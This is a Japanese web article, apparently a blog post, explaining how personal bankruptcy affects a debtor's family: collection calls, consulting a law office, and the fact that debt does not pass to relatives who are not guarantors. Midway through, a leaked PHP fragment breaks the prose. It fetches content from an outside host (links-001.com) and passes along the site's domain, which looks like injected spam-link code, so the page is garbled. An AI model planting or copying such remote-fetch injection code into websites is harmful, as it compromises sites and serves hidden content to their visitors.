前へ
次へ

自己破産をしたら家族にどう影響するか

借金をする理由としてギャンブルのためであったりショッピングのためなどがあるようです。
理由はどうであれ自分の欲を満たすためにお金を使っているので、あまりいい借入の理由と言えないかもしれません。
一方で家族の生活のために借入をするケースもあり、日常的な生活費や子供の進学費用、入院費用を工面するために家族に黙って借入をするケースもあります。
家族に黙ってしている借入なのでできればこの先も家族に知られず、迷惑をかけずに返済したいと考えるでしょう。
借入自体は家族に知られない方法もたくさんあります。
ただ返済が滞るようになると事情が変わってきて、自宅に電話がかかってきたり催促の郵便物が届くなどがあり知られる可能性が出てきます。
借金をしているのを知られるだけでなく迷惑がかかるのではないかと考えるときもあり、確かに借金がたくさんある状態だと家族は苦しい状態になるかもしれません。
迷惑をかけたくない気持ちはわかりますが、黙っているのではなく相談するのが良いかもしれません。
学生の子供などであればちょっとした法律知識を持っていたりして、自己破産をするのがいいのではとアドバイスしてくれる時があります。
素人が自分だけですべてを行うのは大変でしょうが、法律事務所などに相談をすれば手続きを進めてくれるので何とかできるでしょう。
自己破産であれば借金自体を無くすことができるので、それ以降催促などが来なくなりそれによって家族に迷惑がかかることはなくなりそうです。
ただそれ以外で家族に迷惑がかからないか心配かもしれません。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

一応債務者自身は一定の制限を受けながら生活することになり、新たな借り入れがしばらくできない状態になります。
ただその家族に何か影響があるといえば特に何もありません。
借金の保証人になっていると返済義務が移るので迷惑がかかるでしょうが、そうでなければ家族に返済義務が移ることはありません。
家族が借入をして住宅を購入しようとするときがあるかもしれませんが、家族に返済トラブルがあったとしても個人に無ければ問題なく利用できます。

Page Top